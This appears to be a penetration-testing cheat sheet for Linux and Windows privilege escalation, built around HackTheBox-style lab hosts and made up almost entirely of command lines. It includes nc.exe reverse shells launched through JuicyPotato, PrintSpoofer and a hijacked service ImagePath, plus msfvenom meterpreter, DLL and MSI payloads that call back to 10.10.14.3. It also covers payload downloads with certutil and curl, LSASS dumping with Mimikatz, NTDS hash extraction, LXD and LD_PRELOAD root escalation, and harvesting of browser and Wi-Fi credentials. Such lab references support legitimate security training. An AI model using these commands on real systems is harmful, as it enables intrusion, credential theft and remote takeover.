Linux privilege escalation is a critical security concern that involves exploiting vulnerabilities or misconfigurations to gain elevated access to a system. This technique can be used both by authorized users to perform administrative tasks and by attackers to compromise a system's security. Authorized users typically use tools like sudo to temporarily elevate their privileges for specific tasks, such as system configuration or software installation. However, attackers exploit weaknesses in the system, such as kernel vulnerabilities, misconfigured services, or file permissions, to escalate their privileges from a limited user account to the powerful root account. This can lead to severe consequences, including data theft, malware deployment, and system damage. Understanding the methods of privilege escalation is essential for both ethical hackers and system administrators to enhance security and prevent unauthorized access.

Linux

Command Description
ssh htb-student@ SSH to lab target
ps aux grep root
ps au See logged in users
ls /home View user home directories
ls -l ~/.ssh Check for SSH keys for current user
history Check the current user's Bash history
sudo -l Can the user run anything as another user?
ls -la /etc/cron.daily Check for daily Cron jobs
lsblk Check for unmounted file systems/drives
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null Find world-writeable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null Find world-writeable files
uname -a Check the Kernel versiion
cat /etc/lsb-release Check the OS version
gcc kernel_expoit.c -o kernel_expoit Compile an exploit written in C
screen -v Check the installed version of Screen
./pspy64 -pf -i 1000 View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null Find binaries with the SETGID bit set
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root Priv esc with tcpdump
echo $PATH Check the current user's PATH variable contents
PATH=.:${PATH} Add a . to the beginning of the current user's PATH
find / ! -path "/proc/" -iname "config" -type f 2>/dev/null Search for config files
ldd /bin/ls View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart Escalate privileges using LD_PRELOAD
readelf -d payroll grep PATH
gcc src.c -fPIC -shared -o /development/libshared.so Compiled a shared libary
lxd init Start the LXD initialization process
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine Import a local image
lxc init alpine r00t -c security.privileged=true Start a privileged LXD container
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true Mount the host file system in a container
lxc start r00t Start the container
showmount -e 10.129.2.12 Show the NFS export list
sudo mount -t nfs 10.129.2.12:/tmp /mnt Mount an NFS share locally
tmux -S /shareds new -s debugsess Created a shared tmux session socket
./lynis audit system Perform a system audit with Lynis

Windows Privilege Escalation Cheatsheet

Windows privilege escalation is a critical security concern where users or attackers exploit vulnerabilities to gain unauthorized access to higher levels of system privileges. This process involves transitioning from a lower-level user account to a more powerful one, such as an administrator or the "NT AUTHORITY\SYSTEM" account, often by exploiting system misconfigurations or security weaknesses. Privilege escalation can be categorized into two main types: vertical escalation, where an attacker elevates their privileges within the same account, and horizontal escalation, where they gain access to another account with similar or higher privileges. Understanding and managing privilege escalation is essential for both security professionals aiming to protect systems and penetration testers seeking to identify vulnerabilities. Techniques for privilege escalation include exploiting kernel vulnerabilities, abusing weak permissions, and leveraging tools like WinPEAS and PowerUp to identify potential escalation paths.

Initial Enumeration

Command Description
xfreerdp /v: /u:user /pth:32693b11e6aa90eb43d32c72a07ceea6 /dynamic-resolution +clipboard /drive:tools,/home/kali/tools RDP to lab target
ipconfig /all Get interface, IP address and DNS information
arp -a Review ARP table
route print Review routing table
Get-MpComputerStatus Check Windows Defender status
Get-AppLockerPolicy -Effective select -ExpandProperty RuleCollections
Get-AppLockerPolicy -Local Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
set Display all environment variables
systeminfo View detailed system configuration information
wmic qfe Get patches and updates
wmic product get name Get installed programs
tasklist /svc Display running processes
query user Get logged-in users
echo %USERNAME% Get current user
whoami /priv View current user privileges
whoami /groups View current user group information
net user Get all system users
net localgroup Get all system groups
net localgroup administrators View details about a group
net accounts Get passsword policy
netstat -ano Display active network connections
pipelist.exe /accepteula List named pipes
gci \.\pipe\ List named pipes with PowerShell
accesschk.exe /accepteula \.\Pipe\lsass -v Review permissions on a named pipe

Handy Commands

Command Description
mssqlclient.py sql_dev@10.129.43.30 -windows-auth Connect using mssqlclient.py
enable_xp_cmdshell Enable xp_cmdshell with mssqlclient.py
xp_cmdshell whoami Run OS commands with xp_cmdshell
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t * Escalate privileges with JuicyPotato
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd" Escalating privileges with PrintSpoofer
procdump.exe -accepteula -ma lsass.exe lsass.dmp Take memory dump with ProcDump
sekurlsa::minidump lsass.dmp and sekurlsa::logonpasswords Use MimiKatz to extract credentials from LSASS memory dump
dir /q C:\backups\wwwroot\web.config Checking ownership of a file
takeown /f C:\backups\wwwroot\web.config Taking ownership of a file
Get-ChildItem -Path ‘C:\backups\wwwroot\web.config’ select name,directory, @{Name=“Owner”;Expression={(Ge t-ACL $_.Fullname).Owner}}
icacls “C:\backups\wwwroot\web.config” /grant htb-student:F Modifying a file ACL
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL Extract hashes with secretsdump.py
robocopy /B E:\Windows\NTDS .\ntds ntds.dit Copy files with ROBOCOPY
wevtutil qe Security /rd:true /f:text Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 findstr "/user"
Get-WinEvent -LogName security where { $.ID -eq 4688 -and $.Properties[8].Value -like '/user' }
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll Generate malicious DLL
dnscmd.exe /config /serverlevelplugindll adduser.dll Loading a custom DLL with dnscmd
wmic useraccount where name="netadm" get sid Finding a user's SID
sc.exe sdshow DNS Checking permissions on DNS service
sc stop dns Stopping a service
sc start dns Starting a service
reg query \10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters Querying a registry key
reg delete \10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll Deleting a registry key
sc query dns Checking a service status
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local Disabling the global query block list
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3 Adding a WPAD record
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp Compile with cl.exe
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" Add reference to a driver (1)
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 Add reference to a driver (2)
.\DriverView.exe /stext drivers.txt and cat drivers.txt Select-String -pattern Capcom
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys Using EopLoadDriver
c:\Tools\PsService.exe security AppReadiness Checking service permissions with PsService
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" Modifying a service binary path
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA Confirming UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin Checking UAC level
[environment]::OSVersion.Version Checking Windows version
cmd /c echo %PATH% Reviewing path variable
curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll" Downloading file with cURL in PowerShell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll Executing custom dll with rundll32.exe
.\SharpUp.exe audit Running SharpUp
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe" Checking service permissions with icacls
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe" Replace a service binary
wmic service get name,displayname,pathname,startmode findstr /i "auto"
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services Checking for weak service ACLs in the Registry
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443" Changing ImagePath with PowerShell
Get-CimInstance Win32_StartupCommand select Name, command, Location, User
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe Generating a malicious binary
get-process -Id 3324 Enumerating a process ID with PowerShell
get-service ?

Credential Theft

Command Description
findstr /SIM /C:"password" .txt ini .cfg .config *.xml Search for files with the phrase "password"
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' Select-String password
(Get-PSReadLineOption).HistorySavePath Confirm PowerShell history save path
gc (Get-PSReadLineOption).HistorySavePath Reading PowerShell history file
$credential = Import-Clixml -Path 'C:\scripts\pass.xml' Decrypting PowerShell credentials
cd c:\Users\htb-student\Documents & findstr /SI /M "password" .xml .ini *.txt Searching file contents for a string
findstr /si password .xml .ini .txt .config Searching file contents for a string
findstr /spin "password" . Searching file contents for a string
select-string -Path C:\Users\htb-student\Documents*.txt -Pattern password Search file contents with PowerShell
dir /S /B pass.txt == pass.xml == pass.ini == cred == vnc == .config Search for file extensions
where /R C:\ *.config Search for file extensions
Get-ChildItem C:\ -Recurse -Include .rdp, .config, .vnc, .cred -ErrorAction Ignore Search for file extensions using PowerShell
cmdkey /list List saved credentials
.\SharpChrome.exe logins /unprotect Retrieve saved Chrome credentials
.\lazagne.exe -h View LaZagne help menu
.\lazagne.exe all Run all LaZagne modules
Invoke-SessionGopher -Target WINLPE-SRV01 Running SessionGopher
netsh wlan show profile View saved wireless networks
netsh wlan show profile ilfreight_corp key=clear Retrieve saved wireless passwords

Other Commands

Command Description
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat Transfer file with certutil
certutil -encode file1 encodedfile Encode file with certutil
certutil -decode encodedfile file2 Decode file with certutil
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer Query for always install elevated registry key (1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer Query for always install elevated registry key (2)
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi Generate a malicious MSI package
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart Executing an MSI package from command line
schtasks /query /fo LIST /v Enumerate scheduled tasks
Get-ScheduledTask select TaskName,State
.\accesschk64.exe /accepteula -s -d C:\Scripts\ Check permissions on a directory
Get-LocalUser Check local user description field
Get-WmiObject -Class Win32_OperatingSystem select Description
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd Mount VMDK on Linux
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1 Mount VHD/VHDX on Linux
sudo python2.7 windows-exploit-suggester.py --update Update Windows Exploit Suggester database
python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt Running Windows Exploit Suggester